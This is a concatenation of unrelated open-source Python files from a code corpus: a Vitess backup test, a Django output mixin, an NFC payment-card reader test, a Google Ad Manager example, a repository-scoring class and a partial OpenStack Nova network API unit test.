# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import json
import logging
import os
import unittest
import datetime
import MySQLdb
import environment
import tablet
import vtbackup
import utils
from mysql_flavor import mysql_flavor
use_mysqlctld = False
use_xtrabackup = False
stream_mode = 'tar'
tablet_master = None
tablet_replica1 = None
tablet_replica2 = None
backup_tablet = None
xtrabackup_args = []
new_init_db = ''
db_credentials_file = ''
def setUpModule():
global xtrabackup_args
xtrabackup_args = ['-backup_engine_implementation',
'xtrabackup',
'-xtrabackup_stream_mode',
stream_mode,
'-xtrabackup_user=vt_dba',
'-xtrabackup_backup_flags',
'--password=VtDbaPass']
global new_init_db, db_credentials_file
global tablet_master, tablet_replica1, tablet_replica2, backup_tablet
tablet_master = tablet.Tablet(use_mysqlctld=use_mysqlctld,
vt_dba_passwd='VtDbaPass')
tablet_replica1 = tablet.Tablet(use_mysqlctld=use_mysqlctld,
vt_dba_passwd='VtDbaPass')
tablet_replica2 = tablet.Tablet(use_mysqlctld=use_mysqlctld,
vt_dba_passwd='VtDbaPass')
backup_tablet = vtbackup.Vtbackup(vt_dba_passwd='VtDbaPass')
try:
environment.topo_server().setup()
credentials = {
'vt_dba': ['VtDbaPass'],
'vt_app': ['VtAppPass'],
'vt_allprivs': ['VtAllprivsPass'],
'vt_repl': ['VtReplPass'],
'vt_filtered': ['VtFilteredPass'],
}
db_credentials_file = environment.tmproot+'/db_credentials.json'
with open(db_credentials_file, 'w') as fd:
fd.write(json.dumps(credentials))
# Determine which column is used for user passwords in this MySQL version.
proc = tablet_master.init_mysql()
if use_mysqlctld:
tablet_master.wait_for_mysqlctl_socket()
else:
utils.wait_procs([proc])
try:
tablet_master.mquery('mysql', 'select password from mysql.user limit 0',
user='root')
password_col = 'password'
except MySQLdb.DatabaseError:
password_col = 'authentication_string'
utils.wait_procs([tablet_master.teardown_mysql()])
tablet_master.remove_tree(ignore_options=True)
# Create a new init_db.sql file that sets up passwords for all users.
# Then we use a db-credentials-file with the passwords.
new_init_db = environment.tmproot + '/init_db_with_passwords.sql'
with open(environment.vttop + '/config/init_db.sql') as fd:
init_db = fd.read()
with open(new_init_db, 'w') as fd:
fd.write(init_db)
fd.write(mysql_flavor().change_passwords(password_col))
logging.debug("initilizing mysql %s",str(datetime.datetime.now()))
# start mysql instance external to the test
setup_procs = [
tablet_master.init_mysql(init_db=new_init_db,
extra_args=['-db-credentials-file',
db_credentials_file]),
tablet_replica1.init_mysql(init_db=new_init_db,
extra_args=['-db-credentials-file',
db_credentials_file]),
tablet_replica2.init_mysql(init_db=new_init_db,
extra_args=['-db-credentials-file',
db_credentials_file])
]
if use_mysqlctld:
tablet_master.wait_for_mysqlctl_socket()
tablet_replica1.wait_for_mysqlctl_socket()
tablet_replica2.wait_for_mysqlctl_socket()
else:
utils.wait_procs(setup_procs)
logging.debug("done initilizing mysql %s",str(datetime.datetime.now()))
except:
tearDownModule()
raise
def tearDownModule():
utils.required_teardown()
if utils.options.skip_teardown:
return
teardown_procs = [
tablet_master.teardown_mysql(extra_args=['-db-credentials-file',
db_credentials_file]),
tablet_replica1.teardown_mysql(extra_args=['-db-credentials-file',
db_credentials_file]),
tablet_replica2.teardown_mysql(extra_args=['-db-credentials-file',
db_credentials_file])
]
utils.wait_procs(teardown_procs, raise_on_error=False)
environment.topo_server().teardown()
utils.kill_sub_processes()
utils.remove_tmp_files()
tablet_master.remove_tree()
tablet_replica1.remove_tree()
tablet_replica2.remove_tree()
backup_tablet.remove_tree()
class TestBackup(unittest.TestCase):
def setUp(self):
for t in tablet_master, tablet_replica1:
t.create_db('vt_test_keyspace')
def tearDown(self):
for t in tablet_master, tablet_replica1, tablet_replica2:
t.kill_vttablet()
tablet.Tablet.check_vttablet_count()
environment.topo_server().wipe()
for t in [tablet_master, tablet_replica1, tablet_replica2]:
t.reset_replication()
t.set_semi_sync_enabled(master=False, slave=False)
t.clean_dbs()
for backup in self._list_backups():
self._remove_backup(backup)
def _init_tablets(self,init=True,start=True):
xtra_args = ['-db-credentials-file', db_credentials_file]
if use_xtrabackup:
xtra_args.extend(xtrabackup_args)
tablet_master.init_tablet('replica', 'test_keyspace', '0', start=start,
supports_backups=True,
extra_args=xtra_args)
tablet_replica1.init_tablet('replica', 'test_keyspace', '0', start=start,
supports_backups=True,
extra_args=xtra_args)
if init:
utils.run_vtctl(['InitShardMaster', '-force', 'test_keyspace/0',
tablet_master.tablet_alias])
_create_vt_insert_test = '''create table vt_insert_test (
id bigint auto_increment,
msg varchar(64),
primary key (id)
) Engine=InnoDB'''
def _insert_data(self, t, index):
"""Add a single row with value 'index' to the given tablet."""
t.mquery(
'vt_test_keyspace',
"insert into vt_insert_test (msg) values ('test %s')" %
index, write=True)
def _check_data(self, t, count, msg):
"""Check that the specified tablet has the expected number of rows."""
timeout = 10
while True:
try:
result = t.mquery(
'vt_test_keyspace', 'select count(*) from vt_insert_test')
if result[0][0] == count:
break
except MySQLdb.DatabaseError:
# ignore exceptions, we'll just timeout (the tablet creation
# can take some time to replicate, and we get a 'table vt_insert_test
# does not exist exception in some rare cases)
logging.exception('exception waiting for data to replicate')
timeout = utils.wait_step(msg, timeout)
def _restore(self, t, tablet_type='replica',wait_for_state='SERVING'):
"""Erase mysql/tablet dir, then start tablet with restore enabled."""
logging.debug("restoring tablet %s",str(datetime.datetime.now()))
self._reset_tablet_dir(t)
xtra_args = ['-db-credentials-file', db_credentials_file]
if use_xtrabackup:
xtra_args.extend(xtrabackup_args)
t.start_vttablet(wait_for_state=wait_for_state,
init_tablet_type=tablet_type,
init_keyspace='test_keyspace',
init_shard='0',
supports_backups=True,
extra_args=xtra_args)
logging.debug("done restoring tablet %s",str(datetime.datetime.now()))
def _reset_tablet_dir(self, t):
"""Stop mysql, delete everything including tablet dir, restart mysql."""
extra_args = ['-db-credentials-file', db_credentials_file]
utils.wait_procs([t.teardown_mysql(extra_args=extra_args)])
# Specify ignore_options because we want to delete the tree even
# if the test's -k / --keep-logs was specified on the command line.
t.remove_tree(ignore_options=True)
logging.debug("starting mysql %s",str(datetime.datetime.now()))
proc = t.init_mysql(init_db=new_init_db, extra_args=extra_args)
if use_mysqlctld:
t.wait_for_mysqlctl_socket()
else:
utils.wait_procs([proc])
logging.debug("done starting mysql %s",str(datetime.datetime.now()))
def _list_backups(self):
"""Get a list of backup names for the test shard."""
backups, _ = utils.run_vtctl(tablet.get_backup_storage_flags() +
['ListBackups', 'test_keyspace/0'],
mode=utils.VTCTL_VTCTL, trap_output=True)
return backups.splitlines()
def _remove_backup(self, backup):
"""Remove a named backup from the test shard."""
utils.run_vtctl(
tablet.get_backup_storage_flags() +
['RemoveBackup', 'test_keyspace/0', backup],
auto_log=True, mode=utils.VTCTL_VTCTL)
def _backup_only(self, t, initial_backup=False):
"""Erase mysql/tablet dir, then start tablet with restore only."""
logging.debug('starting backup only job')
t.remove_tree(ignore_options=True)
extra_args = ['-allow_first_backup','-db-credentials-file', db_credentials_file]
if use_xtrabackup:
extra_args.extend(xtrabackup_args)
if initial_backup:
extra_args.extend(["-initial_backup"])
logging.debug("starting backup tablet %s",str(datetime.datetime.now()))
proc = t.start_vtbackup(init_db=new_init_db,
init_keyspace='test_keyspace',
init_shard='0',
extra_args=extra_args)
logging.debug('tablet started waiting for process to end %s',proc)
utils.wait_procs([proc],True)
logging.debug("backup tablet done %s",str(datetime.datetime.now()))
def test_tablet_initial_backup(self):
self._test_initial_backup()
# Restore the Shard from the inital backup
self._init_tablets(init=False,start=False)
# Restore the Tablets
self._restore(tablet_master, tablet_type='replica',wait_for_state="NOT_SERVING")
utils.run_vtctl(['TabletExternallyReparented',tablet_master.tablet_alias])
self._restore(tablet_replica1, tablet_type='replica')
# Run the entire backup test
self._test_first_backup('replica', True)
def _test_initial_backup(self):
"""Test Initial Backup Flow
test_initial_backup will:
- Create a shard using vtbackup and --initial-backup
- Create the rest of the cluster restoring from backup
- Externally Reparenting to a master tablet
- Insert Some data
- Verify that the cluster is working
- Take a Second Backup
- Bring up a second replica, and restore from the second backup
- list the backups, remove them
"""
self._backup_only(backup_tablet,initial_backup=True)
backups = self._list_backups()
logging.debug('list of backups after initial: %s', backups)
self.assertEqual(len(backups), 1)
def test_tablet_backup_only(self):
self._init_tablets()
self._test_first_backup('replica', True)
def _test_first_backup(self, tablet_type, backup_only):
"""Test backup flow.
test_backup will:
- create a shard with master and replica1 only
- run InitShardMaster
- insert some data
- take a backup
- insert more data on the master
- bring up tablet_replica2 after the fact, let it restore the backup
- check all data is right (before+after backup data)
- list the backup, remove it
Args:
tablet_type: 'replica' or 'rdonly'.
"""
# insert data on master, wait for slave to get it
backups_count = len(self._list_backups())
tablet_master.mquery('vt_test_keyspace', self._create_vt_insert_test)
self._insert_data(tablet_master, 1)
self._check_data(tablet_replica1, 1, 'replica1 tablet getting data')
# backup the slave
alias = tablet_replica1.tablet_alias
logging.debug("taking backup %s",str(datetime.datetime.now()))
if not backup_only:
utils.run_vtctl(['Backup', tablet_replica1.tablet_alias], auto_log=True)
else:
self._backup_only(backup_tablet)
alias = backup_tablet.tablet_alias
logging.debug("done taking backup %s",str(datetime.datetime.now()))
# end if
# check that the backup shows up in the listing
backups = self._list_backups()
logging.debug('list of backups: %s', backups)
self.assertEqual(len(backups), backups_count+1)
# insert more data on the master
self._insert_data(tablet_master, 2)
# now bring up the other slave, letting it restore from backup.
self._restore(tablet_replica2, tablet_type=tablet_type)
# check the new slave has the data
self._check_data(tablet_replica2, 2, 'replica2 tablet getting data')
# check that the restored slave has the right local_metadata
result = tablet_replica2.mquery('_vt', 'select * from local_metadata')
metadata = {}
for row in result:
metadata[row[0]] = row[1]
self.assertEqual(metadata['Alias'], 'test_nj-0000062346')
self.assertEqual(metadata['ClusterAlias'], 'test_keyspace.0')
self.assertEqual(metadata['DataCenter'], 'test_nj')
if tablet_type == 'replica':
self.assertEqual(metadata['PromotionRule'], 'neutral')
else:
self.assertEqual(metadata['PromotionRule'], 'must_not')
for backup in backups:
self._remove_backup(backup)
backups = self._list_backups()
logging.debug('list of backups after remove: %s', backups)
self.assertEqual(len(backups), 0)
tablet_replica2.kill_vttablet()
if __name__ == '__main__':
utils.main()
| davygeek/vitess | test/backup_only.py | Python | apache-2.0 | 14,271 |
import os
from django.core.management.color import supports_color
from django.utils import termcolors
class VerboseCommandMixin(object):
def __init__(self, *args, **kwargs):
super(VerboseCommandMixin, self).__init__(*args, **kwargs)
self.dry_run = False
if supports_color():
opts = ('bold',)
self.style.EXISTS = \
termcolors.make_style(fg='blue', opts=opts)
self.style.APPEND = \
termcolors.make_style(fg='yellow', opts=opts)
self.style.CREATE = \
termcolors.make_style(fg='green', opts=opts)
self.style.REVERT = \
termcolors.make_style(fg='magenta', opts=opts)
self.style.BACKUP = \
termcolors.make_style(fg='cyan', opts=opts)
def msg(self, action, path):
is_withholding_action = False
non_actions = set(['create', 'append', 'revert'])
if self.dry_run and action in non_actions:
is_withholding_action = True
if hasattr(self.style, action.upper()):
s = getattr(self.style, action.upper())
action = s(action)
if is_withholding_action:
action = self.style.NOTICE('did not ') + action
output = '\t{0:>25}\t{1:<}\n'.format(action, os.path.relpath(path))
self.stdout.write(output)
def log(self, output):
if self.verbose:
self.stdout.write(output)
| noslenfa/tdjangorest | uw/lib/python2.7/site-packages/generate_scaffold/management/verbosity.py | Python | apache-2.0 | 1,463 |
import time
from pynfcreader.sessions.iso14443.iso14443a import Iso14443ASession
def test_iso_14443_a_card_1_generic(hydranfc_connection):
hn = Iso14443ASession(drv=hydranfc_connection, block_size=120)
hn.connect()
hn.field_off()
time.sleep(0.1)
hn.field_on()
hn.polling()
r = hn.send_apdu("00 a4 04 00 0E 32 50 41 59 2E 53 59 53 2E 44 44 46 30 31 00")
assert b'oW\x84\x0e2PAY.S.DDF01\xa5E\xbf\x0cBO\x07\xa0\x00\x00\x00B\x10\x10P\x02\x87\x01\x01\x9f(\x08@\x02\x00\x00\x00\x00a#O\x07\xa0\x00\x00\x00\x04\x10\nMASTERCARD\x02\x9f(\x08@\x00 \x00\x00\x00\x00' == r
r = hn.send_apdu("00 a4 04 00 07 A0 00 00 00 42 10 10 00")
assert b'o?\x84\x07\xa0\x00\x00\x00B\x104P\x02CB\x87\x01\x01\x9f\x11\x01\x12\x0eTransacti CB_-\x04fren\xbf\xdf`\x02\x0b\x14\x9fM\x02\x0b\x14\xdf\x04' == r
r = hn.send_apdu("00 a4 04 00 07 A0 00 00 00 04 10 10 00")
assert b'o?\x84\x07\xa0\x00\x00\x00\x04\x104P\nMASTERCA\x87\x01\x02\x9f\x11\x01\x01\x9f\x12\nMTERCARD_-\x04fn\xbf\x0c\n\xdf`\x02\x0b\x14\x9fM\x14' == r
hn.field_off()
| gvinet/pynfcreader | tests/tests_iso_14443_a_card_1_hydranfc_v2.py | Python | apache-2.0 | 1,077 |
#!/usr/bin/env python
#
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""This code example creates new proposals.
To determine which proposals exist, run get_all_proposals.py.
"""
import uuid
# Import appropriate modules from the client library.
from googleads import ad_manager
ADVERTISER_ID = 'INSERT_ADVERTISER_ID_HERE'
PRIMARY_SALESPERSON_ID = 'INSERT_PRIMARY_SALESPERSON_ID_HERE'
SECONDARY_SALESPERSON_ID = 'INSERT_SECONDARY_SALESPERSON_ID_HERE'
PRIMARY_TRAFFICKER_ID = 'INSERT_PRIMARY_TRAFFICKER_ID_HERE'
def main(client, advertiser_id, primary_salesperson_id,
secondary_salesperson_id, primary_trafficker_id):
# Initialize appropriate services.
proposal_service = client.GetService('ProposalService', version='v201811')
network_service = client.GetService('NetworkService', version='v201811')
# Create proposal objects.
proposal = {
'name': 'Proposal #%s' % uuid.uuid4(),
'advertiser': {
'companyId': advertiser_id,
'type': 'ADVERTISER'
},
'primarySalesperson': {
'userId': primary_salesperson_id,
'split': '75000'
},
'secondarySalespeople': [{
'userId': secondary_salesperson_id,
'split': '25000'
}],
'primaryTraffickerId': primary_trafficker_id,
'probabilityOfClose': '100000',
'budget': {
'microAmount': '100000000',
'currencyCode': network_service.getCurrentNetwork()['currencyCode']
},
'billingCap': 'CAPPED_CUMULATIVE',
'billingSource': 'DFP_VOLUME'
}
# Add proposals.
proposals = proposal_service.createProposals([proposal])
# Display results.
for proposal in proposals:
print ('Proposal with id "%s" and name "%s" was created.'
% (proposal['id'], proposal['name']))
if __name__ == '__main__':
# Initialize client object.
ad_manager_client = ad_manager.AdManagerClient.LoadFromStorage()
main(ad_manager_client, ADVERTISER_ID, PRIMARY_SALESPERSON_ID,
SECONDARY_SALESPERSON_ID, PRIMARY_TRAFFICKER_ID)
| Aloomaio/googleads-python-lib | examples/ad_manager/v201811/proposal_service/create_proposals.py | Python | apache-2.0 | 2,591 |
__author__ = 'Javier'
class Project(object):
def __init__(self, forks, stars, watchs):
self._forks = int(forks)
self._stars = int(stars)
self._watchs = int(watchs)
@property
def forks(self):
return self._forks
@property
def stars(self):
return self._stars
@property
def watchs(self):
return self._watchs
class GIndex(object):
def calculate(self, project):
return project.forks * 3 + project.stars + project.watchs
class ProjectRepositoryService(object):
def __init__(self, conector):
self.conector = conector
self.project_factory = ProjectFactory()
def find(self, user, repo_name):
raw_json = self._read_repo(user, repo_name)
return self.project_factory.build_from(raw_json)
def _read_repo(self, user, repo_name):
repos = self.conector.read_all(user)
for repo in repos:
if repo['name'] == repo_name:
return repo
return None
class ProjectFactory(object):
def build_from(self, json_project):
return Project(json_project['forks_count'],
json_project['watchers_count'],
json_project['stargazers_count']) | javierj/kobudo-katas | Kata-RestConsumer/gindex.py | Python | apache-2.0 | 1,259 |
# Copyright 2012 OpenStack Foundation
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# vim: tabstop=4 shiftwidth=4 softtabstop=4
import uuid
import mox
from oslo.config import cfg
from quantumclient.v2_0 import client
from nova.compute import instance_types
from nova import context
from nova import exception
from nova.network import model
from nova.network import quantumv2
from nova.network.quantumv2 import api as quantumapi
from nova import test
from nova import utils
CONF = cfg.CONF
#NOTE: Quantum client raises Exception which is discouraged by HACKING.
# We set this variable here and use it for assertions below to avoid
# the hacking checks until we can make quantum client throw a custom
# exception class instead.
QUANTUM_CLIENT_EXCEPTION = Exception
class MyComparator(mox.Comparator):
def __init__(self, lhs):
self.lhs = lhs
def _com_dict(self, lhs, rhs):
if len(lhs) != len(rhs):
return False
for key, value in lhs.iteritems():
if key not in rhs:
return False
rhs_value = rhs[key]
if not self._com(value, rhs_value):
return False
return True
def _com_list(self, lhs, rhs):
if len(lhs) != len(rhs):
return False
for lhs_value in lhs:
if lhs_value not in rhs:
return False
return True
def _com(self, lhs, rhs):
if lhs is None:
return rhs is None
if isinstance(lhs, dict):
if not isinstance(rhs, dict):
return False
return self._com_dict(lhs, rhs)
if isinstance(lhs, list):
if not isinstance(rhs, list):
return False
return self._com_list(lhs, rhs)
if isinstance(lhs, tuple):
if not isinstance(rhs, tuple):
return False
return self._com_list(lhs, rhs)
return lhs == rhs
def equals(self, rhs):
return self._com(self.lhs, rhs)
def __repr__(self):
return str(self.lhs)
class TestQuantumClient(test.TestCase):
def test_withtoken(self):
self.flags(quantum_url='http://anyhost/')
self.flags(quantum_url_timeout=30)
my_context = context.RequestContext('userid',
'my_tenantid',
auth_token='token')
self.mox.StubOutWithMock(client.Client, "__init__")
client.Client.__init__(
endpoint_url=CONF.quantum_url,
token=my_context.auth_token,
timeout=CONF.quantum_url_timeout,
insecure=False).AndReturn(None)
self.mox.ReplayAll()
quantumv2.get_client(my_context)
def test_withouttoken_keystone_connection_error(self):
self.flags(quantum_auth_strategy='keystone')
self.flags(quantum_url='http://anyhost/')
my_context = context.RequestContext('userid', 'my_tenantid')
self.assertRaises(QUANTUM_CLIENT_EXCEPTION,
quantumv2.get_client,
my_context)
def test_withouttoken_keystone_not_auth(self):
self.flags(quantum_auth_strategy=None)
self.flags(quantum_url='http://anyhost/')
self.flags(quantum_url_timeout=30)
my_context = context.RequestContext('userid', 'my_tenantid')
self.mox.StubOutWithMock(client.Client, "__init__")
client.Client.__init__(
endpoint_url=CONF.quantum_url,
auth_strategy=None,
timeout=CONF.quantum_url_timeout,
insecure=False).AndReturn(None)
self.mox.ReplayAll()
quantumv2.get_client(my_context)
class TestQuantumv2(test.TestCase):
def setUp(self):
super(TestQuantumv2, self).setUp()
self.addCleanup(CONF.reset)
self.mox.StubOutWithMock(quantumv2, 'get_client')
self.moxed_client = self.mox.CreateMock(client.Client)
quantumv2.get_client(mox.IgnoreArg()).MultipleTimes().AndReturn(
self.moxed_client)
self.context = context.RequestContext('userid', 'my_tenantid')
setattr(self.context,
'auth_token',
'bff4a5a6b9eb4ea2a6efec6eefb77936')
self.instance = {'project_id': '9d049e4b60b64716978ab415e6fbd5c0',
'uuid': str(uuid.uuid4()),
'display_name': 'test_instance',
'availability_zone': 'nova',
'security_groups': []}
self.nets1 = [{'id': 'my_netid1',
'name': 'my_netname1',
'tenant_id': 'my_tenantid'}]
self.nets2 = []
self.nets2.append(self.nets1[0])
self.nets2.append({'id': 'my_netid2',
'name': 'my_netname2',
'tenant_id': 'my_tenantid'})
self.nets3 = self.nets2 + [{'id': 'my_netid3',
'name': 'my_netname3',
'tenant_id': 'my_tenantid'}]
self.nets4 = [{'id': 'his_netid4',
'name': 'his_netname4',
'tenant_id': 'his_tenantid'}]
self.nets = [self.nets1, self.nets2, self.nets3, self.nets4]
self.port_address = '10.0.1.2'
self.port_data1 = [{'network_id': 'my_netid1',
'device_id': 'device_id1',
'device_owner': 'compute:nova',
'id': 'my_portid1',
'fixed_ips': [{'ip_address': self.port_address,
'subnet_id': 'my_subid1'}],
'mac_address': 'my_mac1', }]
self.float_data1 = [{'port_id': 'my_portid1',
'fixed_ip_address': self.port_address,
'floating_ip_address': '172.0.1.2'}]
self.dhcp_port_data1 = [{'fixed_ips': [{'ip_address': '10.0.1.9',
'subnet_id': 'my_subid1'}]}]
self.port_data2 = []
self.port_data2.append(self.port_data1[0])
self.port_data2.append({'network_id': 'my_netid2',
'device_id': 'device_id2',
'device_owner': 'compute:nova',
'id': 'my_portid2',
'fixed_ips': [{'ip_address': '10.0.2.2',
'subnet_id': 'my_subid2'}],
'mac_address': 'my_mac2', })
self.float_data2 = []
self.float_data2.append(self.float_data1[0])
self.float_data2.append({'port_id': 'my_portid2',
'fixed_ip_address': '10.0.2.2',
'floating_ip_address': '172.0.2.2'})
self.port_data3 = [{'network_id': 'my_netid1',
'device_id': 'device_id3',
'device_owner': 'compute:nova',
'id': 'my_portid3',
'fixed_ips': [], # no fixed ip
'mac_address': 'my_mac3', }]
self.subnet_data1 = [{'id': 'my_subid1',
'cidr': '10.0.1.0/24',
'network_id': 'my_netid1',
'gateway_ip': '10.0.1.1',
'dns_nameservers': ['8.8.1.1', '8.8.1.2']}]
self.subnet_data2 = []
self.subnet_data_n = [{'id': 'my_subid1',
'cidr': '10.0.1.0/24',
'network_id': 'my_netid1',
'gateway_ip': '10.0.1.1',
'dns_nameservers': ['8.8.1.1', '8.8.1.2']},
{'id': 'my_subid2',
'cidr': '20.0.1.0/24',
'network_id': 'my_netid2',
'gateway_ip': '20.0.1.1',
'dns_nameservers': ['8.8.1.1', '8.8.1.2']}]
self.subnet_data2.append({'id': 'my_subid2',
'cidr': '10.0.2.0/24',
'network_id': 'my_netid2',
'gateway_ip': '10.0.2.1',
'dns_nameservers': ['8.8.2.1', '8.8.2.2']})
self.fip_pool = {'id': '4fdbfd74-eaf8-4884-90d9-00bd6f10c2d3',
'name': 'ext_net',
'router:external': True,
'tenant_id': 'admin_tenantid'}
self.fip_pool_nova = {'id': '435e20c3-d9f1-4f1b-bee5-4611a1dd07db',
'name': 'nova',
'router:external': True,
'tenant_id': 'admin_tenantid'}
self.fip_unassociated = {'tenant_id': 'my_tenantid',
'id': 'fip_id1',
'floating_ip_address': '172.24.4.227',
'floating_network_id': self.fip_pool['id'],
'port_id': None,
'fixed_ip_address': None,
'router_id': None}
fixed_ip_address = self.port_data2[1]['fixed_ips'][0]['ip_address']
self.fip_associated = {'tenant_id': 'my_tenantid',
'id': 'fip_id2',
'floating_ip_address': '172.24.4.228',
'floating_network_id': self.fip_pool['id'],
'port_id': self.port_data2[1]['id'],
'fixed_ip_address': fixed_ip_address,
'router_id': 'router_id1'}
self._returned_nw_info = []
self.addCleanup(self.stubs.UnsetAll)
self.addCleanup(self.mox.UnsetStubs)
self.addCleanup(self.mox.VerifyAll)
def _verify_nw_info(self, nw_inf, index=0):
id_suffix = index + 1
self.assertEquals('10.0.%s.2' % id_suffix,
nw_inf.fixed_ips()[index]['address'])
self.assertEquals('172.0.%s.2' % id_suffix,
nw_inf.fixed_ips()[index].floating_ip_addresses()[0])
self.assertEquals('my_netname%s' % id_suffix,
nw_inf[index]['network']['label'])
self.assertEquals('my_portid%s' % id_suffix, nw_inf[index]['id'])
self.assertEquals('my_mac%s' % id_suffix, nw_inf[index]['address'])
self.assertEquals('10.0.%s.0/24' % id_suffix,
nw_inf[index]['network']['subnets'][0]['cidr'])
self.assertTrue(model.IP(address='8.8.%s.1' % id_suffix) in
nw_inf[index]['network']['subnets'][0]['dns'])
def _get_instance_nw_info(self, number):
api = quantumapi.API()
self.mox.StubOutWithMock(api.db, 'instance_info_cache_update')
api.db.instance_info_cache_update(mox.IgnoreArg(),
self.instance['uuid'],
mox.IgnoreArg())
port_data = number == 1 and self.port_data1 or self.port_data2
self.moxed_client.list_ports(
tenant_id=self.instance['project_id'],
device_id=self.instance['uuid']).AndReturn(
{'ports': port_data})
nets = number == 1 and self.nets1 or self.nets2
self.moxed_client.list_networks(
tenant_id=self.instance['project_id'],
shared=False).AndReturn({'networks': nets})
self.moxed_client.list_networks(
shared=True).AndReturn({'networks': []})
for i in xrange(1, number + 1):
float_data = number == 1 and self.float_data1 or self.float_data2
for ip in port_data[i - 1]['fixed_ips']:
float_data = [x for x in float_data
if x['fixed_ip_address'] == ip['ip_address']]
self.moxed_client.list_floatingips(
fixed_ip_address=ip['ip_address'],
port_id=port_data[i - 1]['id']).AndReturn(
{'floatingips': float_data})
subnet_data = i == 1 and self.subnet_data1 or self.subnet_data2
self.moxed_client.list_subnets(
id=mox.SameElementsAs(['my_subid%s' % i])).AndReturn(
{'subnets': subnet_data})
self.moxed_client.list_ports(
network_id=subnet_data[0]['network_id'],
device_owner='network:dhcp').AndReturn(
{'ports': []})
self.mox.ReplayAll()
nw_inf = api.get_instance_nw_info(self.context, self.instance)
for i in xrange(0, number):
self._verify_nw_info(nw_inf, i)
def test_get_instance_nw_info_1(self):
# Test to get one port in one network and subnet.
quantumv2.get_client(mox.IgnoreArg(),
admin=True).MultipleTimes().AndReturn(
self.moxed_client)
self._get_instance_nw_info(1)
def test_get_instance_nw_info_2(self):
# Test to get one port in each of two networks and subnets.
quantumv2.get_client(mox.IgnoreArg(),
admin=True).MultipleTimes().AndReturn(
self.moxed_client)
self._get_instance_nw_info(2)
def test_get_instance_nw_info_with_nets(self):
# Test get instance_nw_info with networks passed in.
api = quantumapi.API()
self.mox.StubOutWithMock(api.db, 'instance_info_cache_update')
api.db.instance_info_cache_update(
mox.IgnoreArg(),
self.instance['uuid'], mox.IgnoreArg())
self.moxed_client.list_ports(
tenant_id=self.instance['project_id'],
device_id=self.instance['uuid']).AndReturn(
{'ports': self.port_data1})
port_data = self.port_data1
for ip in port_data[0]['fixed_ips']:
self.moxed_client.list_floatingips(
fixed_ip_address=ip['ip_address'],
port_id=port_data[0]['id']).AndReturn(
{'floatingips': self.float_data1})
self.moxed_client.list_subnets(
id=mox.SameElementsAs(['my_subid1'])).AndReturn(
{'subnets': self.subnet_data1})
self.moxed_client.list_ports(
network_id='my_netid1',
device_owner='network:dhcp').AndReturn(
{'ports': self.dhcp_port_data1})
quantumv2.get_client(mox.IgnoreArg(),
admin=True).MultipleTimes().AndReturn(
self.moxed_client)
self.mox.ReplayAll()
nw_inf = api.get_instance_nw_info(self.context,
self.instance,
networks=self.nets1)
self._verify_nw_info(nw_inf, 0)
def test_get_instance_nw_info_without_subnet(self):
# Test get instance_nw_info for a port without subnet.
api = quantumapi.API()
self.mox.StubOutWithMock(api.db, 'instance_info_cache_update')
api.db.instance_info_cache_update(
mox.IgnoreArg(),
self.instance['uuid'], mox.IgnoreArg())
self.moxed_client.list_ports(
tenant_id=self.instance['project_id'],
device_id=self.instance['uuid']).AndReturn(
{'ports': self.port_data3})
self.moxed_client.list_networks(
shared=False,
tenant_id=self.instance['project_id']).AndReturn(
{'networks': self.nets1})
self.moxed_client.list_networks(
shared=True).AndReturn({'networks': []})
quantumv2.get_client(mox.IgnoreArg(),
admin=True).MultipleTimes().AndReturn(
self.moxed_client)
self.mox.ReplayAll()
nw_inf = api.get_instance_nw_info(self.context,
self.instance)
id_suffix = 3
self.assertEquals(0, len(nw_inf.fixed_ips()))
self.assertEquals('my_netname1', nw_inf[0]['network']['label'])
self.assertEquals('my_portid%s' % id_suffix, nw_inf[0]['id'])
self.assertEquals('my_mac%s' % id_suffix, nw_inf[0]['address'])
self.assertEquals(0, len(nw_inf[0]['network']['subnets']))
def test_refresh_quantum_extensions_cache(self):
api = quantumapi.API()
self.moxed_client.list_extensions().AndReturn(
{'extensions': [{'name': 'nvp-qos'}]})
self.mox.ReplayAll()
api._refresh_quantum_extensions_cache()
self.assertEquals({'nvp-qos': {'name': 'nvp-qos'}}, api.extensions)
def test_populate_quantum_extension_values_rxtx_factor(self):
api = quantumapi.API()
self.moxed_client.list_extensions().AndReturn(
{'extensions': [{'name': 'nvp-qos'}]})
self.mox.ReplayAll()
instance_type = instance_types.get_default_instance_type()
instance_type['rxtx_factor'] = 1
sys_meta = utils.dict_to_metadata(
instance_types.save_instance_type_info({}, instance_type))
instance = {'system_metadata': sys_meta}
port_req_body = {'port': {}}
api._populate_quantum_extension_values(instance, port_req_body)
self.assertEquals(port_req_body['port']['rxtx_factor'], 1)
def _stub_allocate_for_instance(self, net_idx=1, **kwargs):
api = quantumapi.API()
self.mox.StubOutWithMock(api, '_get_instance_nw_info')
self.mox.StubOutWithMock(api, '_populate_quantum_extension_values')
# Net idx is 1-based for compatibility with existing unit tests
nets = self.nets[net_idx - 1]
ports = {}
fixed_ips = {}
macs = kwargs.get('macs')
if macs:
macs = set(macs)
req_net_ids = []
if 'requested_networks' in kwargs:
for id, fixed_ip, port_id in kwargs['requested_networks']:
if port_id:
self.moxed_client.show_port(port_id).AndReturn(
{'port': {'id': 'my_portid1',
'network_id': 'my_netid1',
'mac_address': 'my_mac1'}})
ports['my_netid1'] = self.port_data1[0]
id = 'my_netid1'
if macs is not None:
macs.discard('my_mac1')
else:
fixed_ips[id] = fixed_ip
req_net_ids.append(id)
expected_network_order = req_net_ids
else:
expected_network_order = [n['id'] for n in nets]
if kwargs.get('_break') == 'pre_list_networks':
self.mox.ReplayAll()
return api
search_ids = [net['id'] for net in nets if net['id'] in req_net_ids]
